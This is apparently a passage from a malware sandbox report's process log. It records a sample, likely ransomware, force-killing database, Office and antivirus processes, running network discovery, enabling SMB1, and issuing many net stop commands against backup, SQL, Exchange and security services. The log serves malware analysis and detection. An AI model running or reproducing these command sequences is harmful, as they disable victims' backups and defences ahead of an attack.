C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlservr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10396
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlbrowser.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10388
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlagent.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10380
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM oracle.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10372
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocssd.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10364
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocautoupds.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10356
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-opt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10348
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM wordpad.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10340
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld-nt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10328
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM winword.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10316
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10304
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM visio.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10292
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10280
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM powerpnt.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10268
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msftesql.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10256
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tmlisten.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10244
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM outlook.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7932
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM msaccess.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6984
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM PccNTMon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7672
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8164
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:8252
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2672
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM xfssvccon.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7784
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbsnmp.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7760
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" IM thunderbird.exe /F2⤵
- Kills process with taskkill
PID:8020
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM zoolz.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2208
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mbamtray.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7276
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM infopath.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7212
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM ocomm.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7092
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat64.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7044
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM dbeng50.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6976
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM tbirdconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:7688
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10236
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM CNTAoSMgr.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10216
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM excel.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10200
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM encsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10184
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c net view2⤵PID:15684
-
C:\Windows\SysWOW64\net.exenet view3⤵
- Discovers systems in the same network
PID:15948
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" & Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:15676
-
-
C:\Windows\SysWOW64\arp.exe"arp" -a2⤵PID:16032
-
-
C:\Windows\SysWOW64\net.exe"net.exe" use \\10.10.0.392⤵PID:16200
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10168
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10144
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10132
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10116
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10096
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10084
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10072
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10048
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10024
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:9968
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:9960
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:9952
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵PID:9944
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:9884
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵PID:9656
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EsgShKernel /y2⤵PID:9644
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPSAMA /y2⤵PID:9636
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ntrtscan /y2⤵PID:9624
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EPUpdateService /y2⤵PID:9616
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$TPS /y2⤵PID:8852
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:8748
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:8736
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵PID:8652
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DCAgent /y2⤵PID:6812
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SHAREPOINT /y2⤵PID:6800
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:6792
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AVP /y2⤵PID:6780
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /y2⤵PID:6772
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SBSMONITORING /2⤵PID:6764
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:6756
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Antivirus /y2⤵PID:6748
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROFXENGAGEMENT /y2⤵PID:6736
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:6728
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:6716
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PROD /y2⤵PID:6708
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:6700
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Web Control Service” /y2⤵PID:6692
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTTICEBGC /y2⤵PID:6684
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDeviceMediaService /y2⤵PID:6672
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos System Protection Service” /y2⤵PID:6664
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$PRACTICEMGT /y2⤵PID:6652
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:6644
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Safestore Service” /y2⤵PID:6636
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop audioendpointbuilder /y2⤵PID:6628
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$ECWDB2 /y2⤵PID:6620
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:6608
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Message Router” /y2⤵PID:6600
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop unistoresvc_1af40a /y2⤵PID:6588
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$BKUPEXEC /y2⤵PID:6580
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ARSM /y2⤵PID:6572
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Client” /y2⤵PID:6564
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeimap4 /y2⤵PID:6556
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “intel(r) proset monitoring service” /y2⤵PID:6544
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPSAMA /y2⤵PID:6536
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:6520
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos MCS Agent” /y2⤵PID:6512
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msexchangeadtopology /y2⤵PID:6504
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “aphidmonitorservice” /y2⤵PID:6488
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$TPS /y2⤵PID:6480
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Zoolz 2 Service” /y2⤵PID:6472
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPSAMA /y2⤵PID:6464
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Health Service” /y2⤵PID:6456
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSRS /y2⤵PID:6448
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop W3Svc /y2⤵PID:6436
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SYSTEM_BGC /y2⤵PID:6428
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Veeam Backup Catalog Data Service” /y2⤵PID:6420
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$TPS /y2⤵PID:6412
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos File Scanner Service” /y2⤵PID:6400
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeSA /y2⤵PID:6392
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop UI0Detect /y2⤵PID:6380
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSOLAP$SQL_2008 /y2⤵PID:6372
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Symantec System Recovery” /y2⤵PID:6364
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SYSTEM_BGC /y2⤵PID:6356
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Device Control Service” /y2⤵PID:6348
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMTA /y2⤵PID:6336
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SstpSvc /y2⤵PID:6328
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop msftesql$PROD /y2⤵PID:6316
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Filter Service” /y2⤵PID:6308
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:6300
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SMTPSvc /y2⤵PID:6292
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Clean Service” /y2⤵PID:6284
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeMGMT /y2⤵PID:6276
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop POP3Svc /y2⤵PID:6268
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer110 /y2⤵PID:6256
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQLsafe Backup Service” /y2⤵PID:6248
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer /y2⤵PID:6240
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SamSs /y2⤵PID:6228
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos AutoUpdate Service” /y2⤵PID:6220
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeIS /y2⤵PID:6212
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetMsmqActivator /y2⤵PID:6204
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer100 /y2⤵PID:6196
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “SQL Backups /y2⤵PID:6188
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Enterprise Client Service” /y2⤵PID:6176
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop EraserSvc11710 /y2⤵PID:6168
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Sophos Agent” /y2⤵PID:6156
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSExchangeES /y2⤵PID:6148
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop IISAdmin /y2⤵PID:5168
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MsDtsServer /y2⤵PID:4344
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop “Acronis VSS Provider” /y2⤵PID:6136
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵PID:6128
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵PID:6116
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:6108
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵PID:6100
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:6092
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:6084
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:6072
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:6064
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:6052
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:6044
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop vapiendpoint /y2⤵PID:6036
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mssql$vim_sqlexp /y2⤵PID:6028
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop WRSVC /y2⤵PID:6016
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY$ECWDB2 /y2⤵PID:6008
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyServiceHelper /y2⤵PID:5996
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLTELEMETRY /y2⤵PID:5988
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKeyScheduler /y2⤵PID:5980
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSERVERAGENT /y2⤵PID:5972
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TrueKey /y2⤵PID:5964
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLSafeOLRService /y2⤵PID:5952
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop tmlisten /y2⤵PID:5944
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLBrowser /y2⤵PID:5932
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop TmCCSF /y2⤵PID:5924
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2012 /y2⤵PID:5916
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update_64 /y2⤵PID:5908
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y2⤵PID:5900
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_update /y2⤵PID:5892
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPSAMA /y2⤵PID:5884
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_service /y2⤵PID:5876
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$TPS /y2⤵PID:5864
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop swi_filter /y2⤵PID:5852
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SYSTEM_BGC /y2⤵PID:5844
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop svcGenericHost /y2⤵PID:5836
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SOPHOS /y2⤵PID:5820
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SQL_2008 /y2⤵PID:5808
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophossps /y2⤵PID:5800
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SHAREPOINT /y2⤵PID:5792
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SntpService /y2⤵PID:5784
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$SBSMONITORING /y2⤵PID:5776
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SmcService /y2⤵PID:5768
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROFXENGAGEMENT /y2⤵PID:5756
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Smcinst /y2⤵PID:5748
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PROD /y2⤵PID:5740
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ShMonitor /y2⤵PID:5732
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEMGT /y2⤵PID:5720
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SepMasterService /y2⤵PID:5712
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$PRACTTICEBGC /y2⤵PID:5704
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVService /y2⤵PID:5696
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$ECWDB2 /y2⤵PID:5688
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SAVAdminService /y2⤵PID:5680
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CXDB /y2⤵PID:5672
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sacsvr /y2⤵PID:5660
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$CITRIX_METAFRAME /y2⤵PID:5652
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SOPHOS /y2⤵PID:5640
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SQLAgent$BKUPEXEC /y2⤵PID:5632
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sms_site_sql_backup /y2⤵PID:5624
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfevtp /y2⤵PID:5616
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RESvc /y2⤵PID:5608
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y2⤵PID:5596
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfemms /y2⤵PID:5588
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ReportServer$SQL_2008 /y2⤵PID:5580
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop wbengine /y2⤵PID:5572
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfefire /y2⤵PID:5564
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop OracleClientCache80 /y2⤵PID:5556
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:5548
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McTaskManager /y2⤵PID:5536
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL80 /y2⤵PID:5528
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamRESTSvc /y2⤵PID:5520
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McShield /y2⤵PID:5508
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MySQL57 /y2⤵PID:5500
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:5492
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFrameworkMcAfeeFramework /y2⤵PID:5484
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerOLAPService /y2⤵PID:5476
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamMountSvc /y2⤵PID:5468
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeFramework /y2⤵PID:5456
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper100 /y2⤵PID:5448
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamHvIntegrationSvc /y2⤵PID:5440
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeEngineService /y2⤵PID:5432
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLServerADHelper /y2⤵PID:5424
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamEnterpriseManagerSvc /y2⤵PID:5416
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBEndpointAgent /y2⤵PID:5408
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLSERVER /y2⤵PID:5392
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploySvc /y2⤵PID:5376
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MBAMService /y2⤵PID:5368
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPSAMA /y2⤵PID:5360
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:5352
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop masvc /y2⤵PID:5344
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$TPS /y2⤵PID:5336
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCloudSvc /y2⤵PID:5316
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop macmnsvc /y2⤵PID:5308
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y2⤵PID:5300
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamCatalogSvc /y2⤵PID:3796
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop klnagent /y2⤵PID:2084
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop FA_Scheduler /y2⤵PID:3568
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2012 /y2⤵PID:3940
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SDRSVC /y2⤵PID:5044
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ESHASRV /y2⤵PID:2080
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:5004
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SYSTEM_BGC /y2⤵PID:4920
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:4844
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:4884
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:4156
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$VEEAMSQL2008R2 /y2⤵PID:5012
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ekrn /y2⤵PID:4836
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQLEXPRESS /y2⤵PID:4748
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵PID:4592
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:4532
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:4464
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop MSSQL$SQL_2008 /y2⤵PID:4160
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵PID:2556
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵PID:3860
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:3868
-
-
C:\Windows\SysWOW64\net.exe"net.exe" start FDResPub /y2⤵PID:3236
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop bedbg /y2⤵PID:1184
-
